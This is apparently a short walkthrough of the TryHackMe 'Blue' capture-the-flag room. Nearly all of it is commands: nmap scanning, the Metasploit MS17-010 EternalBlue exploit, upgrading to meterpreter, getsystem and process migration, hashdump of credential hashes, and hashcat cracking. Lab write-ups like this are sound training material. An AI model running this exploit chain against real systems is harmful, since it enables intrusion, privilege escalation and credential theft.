TryHackMe: Blue (Eternal Blue)

[ TASK 1 ]: Recon

nmap -sC -sV -Pn <machine_ip>
  • -sC =script scan
  • -sV=version detection
  • -Pn=doesnt send ping probes to machine
nmap -script vuln -Pn <machine_ip>

[ TASK 2 ]: Gain Access

 msfconsole
search ms17–010
use 2
show options
set RHOSTS <machine_ip>
exploit
ctrl+z

[ TASK 3 ]:Escalate

search shell_to_meterpreter
use 0
show optionsset session 1
run
show sessions
sessions -i 2
getsystem
getuid
ps
migrate -P 2740

[ TASK 4 ]:Cracking

hashdump
apt-get install hashcat
hashcat -a 0 -m 1000 hashes.txt <location_of_the_wordlist>

[ TASK 5 ]:Find Flags !

search -f flag*.txt
  1. pwd=print the current working directory
  2. dir =lists the files in the current directory
  3. cd .. =go back
  4. cat =view the contents of the file

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store